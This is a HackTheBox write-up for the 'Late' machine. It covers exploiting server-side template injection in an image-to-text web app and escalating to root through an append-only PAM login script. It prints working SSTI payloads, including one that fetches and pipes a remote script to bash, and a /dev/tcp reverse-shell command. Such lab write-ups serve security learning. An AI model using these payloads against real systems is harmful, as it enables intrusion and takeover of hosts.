Late — Hackthebox Walkthrough

My first machine on Hackthebox, late was an easy linux machine. I wanted to give a taste of exploiting SSTI in a unique to the beginners who aren’t familiar with the it. Hope I had done a good job with this one.

User

Nmap gives us, three open ports. Port 22, 80 and port 50816.

nmap -p- -v 192.168.1.4

Visiting port 80 we see a static webpage.

Doing some vhost fuzzing, we can find another vhost called image.late.htb

This site lets us convert images to text. We can upload a image and see what it gives. I used an online Text-to-Image converter to create the image.

After uploading the image, we get the extracted text.

So we know this works fine. We can test the application for common vulnetabilities like XSS, SQLi and CMDi. First we have to create the images with the payloads and upload them.

Testing for these vulnerabilities, we get a hit with a SSTI payload like {{7*7}}

Being the name of the box “Late” we can see why SSTI worked (Temp”late”). Now its confirmed that SSTI in possible here. But when we try to get RCE by uploading an image with payload like this,

{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}

it doesn’t work. This is because, in the process of conversion of image to text, sometimes some character are left behind unidentified. For example, when I convert:

this to text, it gets converted to:

Note that some new character are added and some are reduced. So the best way to go about this is to create our own script that will create the image. Since we know that this is using python, we can proceed to create the script with python.

After setting “t” to be equal to the SSTI payload, we can embed that in an image with this script.

Now we can try to create an image with a proper SSTI payload in it. There are various ways to do RCE with SSTI. After a couple tries, you can see this payload works fine with the script and the application itself.

{{request['application']['\x5f\x5f' + 'globals'+'\x5f\x5f' ]['\x5f\x5fbuiltins\x5f\x5f']['\x5f\x5fimport\x5f\x5f']("os")['popen']('id')['read']()}}

We can create the image with this payload, upload this and vefify that we indeed have Remote Code Execution.

With a little bit of tinkering, we can get a reverse shell with this payload.

{{request['application']['\x5f\x5f' + 'globals'+'\x5f\x5f' ]['\x5f\x5f'+'builtins'+'\x5f\x5f' ]['\x5f\x5fimport\x5f\x5f']("os")['popen']('curl 192.168.1.7/k|bash')['read']()}}

Root

We can put our ssh key to authorized_keys file and ssh in.

Running pspy, we see that there are some commands reagarding to seding mails. By analyzing the behavior we can see that whenever a user logs in with ssh, a mail is sent to “root@late.htb”.

These types of scripts are usually configured with PAM. Looking at the PAM configuration we can see there is a option to run a script after every successful login. (/etc/pam.d/sshd)

Looking at the script that’s running, we can see that its owned by “svc_acc” user.

Since PAM scripts are run as root in the startup, if we put a command in this file, it should be executed as root.
But when we try to edit the file, we get an error saying “Operation not permitted”.

Usually this error appears when we try to write a file that we dont have access to. But here we do have permissions to write to the file as we saw earlier. Even though we own the file, if we look at the attributes of the file, we can see that the “a” attribute is set.

lsattr ssh-alert.sh

Which means we can only append to the file and can’t overwrite the file.

So we can just append the command we want to execute to the file.

echo 'bash -i >& /dev/tcp/192.168.1.7/9090 0>&1' >> ssh-alert.sh

After running this, we can start a listener and log in as “svc_acc” with ssh. Then the PAM scripts get executed and we get a shell as root.

And rooted!!

This being my first box in HTB, I am extremely happy that I have accomplished this at such a young age.

“If you have any questions, make sure to leave them down in the comments, or contact me through social media.”

Email — iamkavigihan@gmail.com
Instagram —
https://www.instagram.com/_kavi.gihan/

Happy Hacking !!! 😄

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Kavishka Gihan

Kavishka Gihan

Cyber Security Student — find me on instagram @_kavi.gihan